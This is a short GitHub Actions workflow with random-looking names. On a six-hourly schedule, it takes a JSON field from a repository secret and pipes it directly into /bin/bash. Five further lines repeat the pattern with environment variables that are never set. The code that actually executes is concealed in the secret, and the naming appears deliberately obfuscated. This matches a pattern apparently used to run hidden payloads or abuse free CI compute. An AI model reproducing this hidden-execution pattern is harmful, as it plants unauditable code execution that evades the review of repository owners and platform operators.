name: yebawang8765
on:
  workflow_dispatch:
  schedule:
    - cron: '28 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yebawang8765
        env:
          xsvcm5421: ${{ secrets.xsvcm5421 }}
        run: |
          echo $xsvcm5421 | jq -r .ltd33 | /bin/bash
          echo $cbv6 | jq -r .dgrj1 | /bin/bash
          echo $cnr75481 | jq -r .tftg8 | /bin/bash
          echo $f80 | jq -r .pwsav3 | /bin/bash
          echo $ry616 | jq -r .qclxb1035 | /bin/bash
          echo $rpqhf26 | jq -r .iyox36 | /bin/bash

